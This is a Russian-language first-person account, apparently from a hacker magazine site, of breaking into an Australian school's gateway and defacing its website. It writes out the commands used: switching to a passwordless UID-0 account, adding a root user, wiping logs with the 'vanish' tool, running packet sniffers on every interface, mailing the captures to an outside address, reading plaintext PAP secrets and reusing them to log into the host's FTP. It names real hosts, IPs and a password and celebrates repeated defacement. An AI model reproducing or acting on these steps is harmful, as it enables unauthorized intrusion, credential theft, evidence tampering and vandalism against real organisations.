Я частенько бываю на канале #hacker, и там мне
kork, дал один shell(не на халяву, конечно). Я
подрубился ssh’ом, т.к. телнет был закрыт:
ssh kork@203.16.9.111 У меня
спросили pass. Pass тогда был sara666. Ввел логин и
пасс. Вошел под пользователем kork с очень
большим UID:).И он мне сказал маленькую фишку:
su spf :). Cначала я посмотрел в /etc/passwd, найдя spf, с
uid и gid 0 и с пустым паролем. Потом убедился в
этом командой whoami. Я поставил пароль spf’у, обрубив
kork’у root shell(он уже мой). И сменил пароль самому
kork’у. Потом убил его бэкдор в inetd.conf, далее
убив процесс командой killall — HUP ident (это inetd). И
все пошло, как по маслу. На всякий случай я
добавил пользователя stalsen с правами root. Потом
я нашел в файле /etc/passwd домашний каталог kork’а.
Это
был стелс каталог(.kork). Я его удалил. Дальше я
занялся логами. Я воспользовался прогой vanish.
После
компиляции введя команду ./vanish root
geteway.singletonps.wa.edu.au my_ip логи исчезли в никуда (точнее
мои засветки в логах). Так же очистил от
логов spf, т. к. первый раз я по нему заходил. И
от kork’а логи пропатчил. Потом посмотрел /var/spool/mail/root.
Там
было ОЧЕНЬ много разных лог записей от
разных демонят. И как я понял, root в них ООЧЕНЬ
долго не заглядывал. Но система была чиста
от меня и я решил все так оставить. Вроде все
OK.

Потом у меня возник вопрос: Что это за
система?
Я знал IP шелла. Отрезольвил и получил:
IP:203.16.9.111
Adress:singletonps.wa.edu.au

Потом по альтевисте посмотрел, что у нас
есть на этот singletonps. Это оказался какой-то
университет. Их официальный сайт находится
на www.singletonps.wa.edu.au.Он
находился в Австралии(au). И мне захотелось
его отдефейсить. Попробовал
приконнектиться к ssh.root -Permissin denied. Теперь
нужно посмотреть список юзверей в моем /etc/passwd
в системе. Это root, akara, yvonneh, lab1 до 15 и room1 до 25,
stalsen, sdf, kork, staff, musik. Все мои попытки юзверями
пробиться в ssh на их WWW servak ушли в никуда. Даже
пароль не спрашивали. Ну мы ведь сидим на
шлюзе (маршрутизаторе), а значит он
соединяет локалку(возможно несколько) с
инетом, еще держит smtp сервак и является dialin’ом.
Для
получения примерной архитектуры сети установим сниффер.
Ведь возможно их WWW servak
стоит за шлюзом, а может в локалке прикрыт
брандмауэром:).Я установил простенький сниф
linux_sniffer.c. Он просто перехватывал все
входящие/исходящие пакеты. Это нам и нужно. Скомплился
он у меня нормально. Потом я узнал все
интерфейсы командой ifconfig -a. Это eth0, lo, ppp0. Я
решил на каждый из них поставить снифф:
./sniff eth0 2 > sniff.log &
./sniff lo 2 > snifflo.log &
./sniff ppp0 2 > sniffppp.log &

Теперь нужно проверить правильность
установки сниффака. Даем команду ifconfig -a. Получаем:
eth0    Link encap:Ethernet  HWaddr 02:60:8C:AE:73:6A
          inet addr:192.168.0.1 
Bcast:192.168.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING
PROMISC MULTICAST  MTU:1500  Metric:1
          RX packets:12255 errors:0
dropped:0 overruns:0 frame:2155
          TX packets:6 errors:0
dropped:0 overruns:0 carrier:0
          collisions:1
txqueuelen:100
          Interrupt:9 Base
address:0x300 Memory:c8000-ca000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 
Mask:255.0.0.0
          UP LOOPBACK RUNNING
PROMISC  MTU:3924  Metric:1
          RX packets:218 errors:0
dropped:0 overruns:0 frame:0
          TX packets:218 errors:0
dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0

ppp0      Link encap:Point-to-Point Protocol
          inet addr:203.16.9.111 
P-t-P:203.16.9.38  Mask:255.255.255.255
          UP POINTOPOINT RUNNING
NOARP PROMISC MULTICAST  MTU:576  Metric:1
          RX packets:758 errors:1
dropped:0 overruns:0 frame:1
          TX packets:788 errors:0
dropped:0 overruns:0 carrier:0
          collisions:0
txqueuelen:10

Как видите — все карточки стоят в режиме
PROMISC. То есть сниффак начал работу. Командой ls
убедился созданием логов сниффака. Теперь
остается ждать логов сниффака… Ну и
затираем логи.

Через несколько часов я зашел туда
посмотреть логи. А вот логи были просто
ОГРОМНЫЕ. Смотреть их в шелле было просто
убийством. И я послал их себе по мылу
командой:
cat sniff.log | mail my_pass_mail@mail.ru
cat snifflo.log | mail my_pass_mail@mail.ru
cat sniffppp.log | mail my_pass_mail@mail.ru

Потом очистил логи и свалил к мылбоксу:).
Скопировал себе почту я вышел из сети. Начал
разглядывать логи сниффака. Первое: было
много коннектов через наш шлюз к http://www.singletonps.wa.edu.au/
=>Сервак находится в интернет-просторах, а
не в локалке, прикрытой брандмауэром :)(если
бы он находился в локалке, пакеты не
приходили бы на шлюз, соединяющий LAN с
инетом). Второе: локальные пользователи
очень любили проверять свою почту :). Третье:
всегда высвечивался коннект с компа Macintosh. Наверное,
он использовался в качестве proxy сервака или
брандмауэра для локалки. Из этого всего
можно уже составить приблизительную
архитектуру сети.

Слева располагаются клиентские компы. Они
объединены в локалку (так как в шлюзе есть
интерфейс eth0), для выхода в инет компы
подрубаются к шлюзу. Там даже стоит dialin(интерфейс
ppp0). Их WWW servak находится за шлюзом, т.к. чтобы
попасть на сервак http://www.singletonps.wa.edu.au/,
машины коннектились через шлюз (по логам
снифера).Значит http://www.singletonps.wa.edu.au/
— отдельная машина, не связанная с локалкой и
шлюзом, она одна на просторах инета. Так,
узнаем где он хостится. Делаем все просто.
Вводим несуществующий URL: http://www.singletonps.wa.edu.au/ddfg
и он нас посылает на адресок http://www.southwest.com.au/404.html=>
что университет хостится на www.southwest.com.au
(хотя можно использовать whois). Теперь нужно
узнать метод закачки файлов для паг. Я залез
в хелп файл и нашел интересный вопрос :"Uploading
Your Web Pages To Our Server ". В общем, нужно
коннектиться к ftp.southwest.com.au
как ни странно:), ввести свой логин и пасс. Осталось
узнать логин и пасс. Лезем смотреть
юзверьскую почту. Единственное письмо с
паролем сообщал о зарегивании на WorldSchool с
логином и пассом singleton :)))). Но там ничего
интересного не было. Теперь лезем в наш root
shell на шлюзе и скачиваем файл паролей (/etc/passwd
— shadow не использовался).Теперь просим Джона
потрошителя расшифровать пароли. Но потом у
меня возникла довольно тривиальная идея. У
них есть dialin сервак(т.к есть интерфейс
ppp0).=>Есть логины и пассы либо в /etc/ppp/pap-secrets
либо в /etc/chap-secrets. Они юзали pap. В pap(как и в chap)
пароли хранятся открытым текстом(!). Так я
нашел только одну запись c логином singleps и
пассом. Теперь надеемся на австралийскую
леность и незнание, ламоватость админа,
коннектимся к ftp.southwest.com.au,
вводим

логин и пасс….и входим в аккаунт. Я
быстренько сбацал страничку типа дефейс:),
ну а остальное дело техники.

P.S. Хостинг просек все дело быстро и уже на
следующий день мой индекс убрали, написав:

Sorry, you are not allowed to access the given URL.
If you think this error is incorrect, then please contact the webmaster.

Но пасс все еще работал:))))::::: и я закачал
новый index::::)))):::

Оставить мнение

Check Also

Скрытая сила пробела. Эксплуатируем критическую уязвимость в Apache Tomcat

В этой статье мы поговорим о баге в Apache Tomcat, популярнейшем веб-сервере для сайтов на…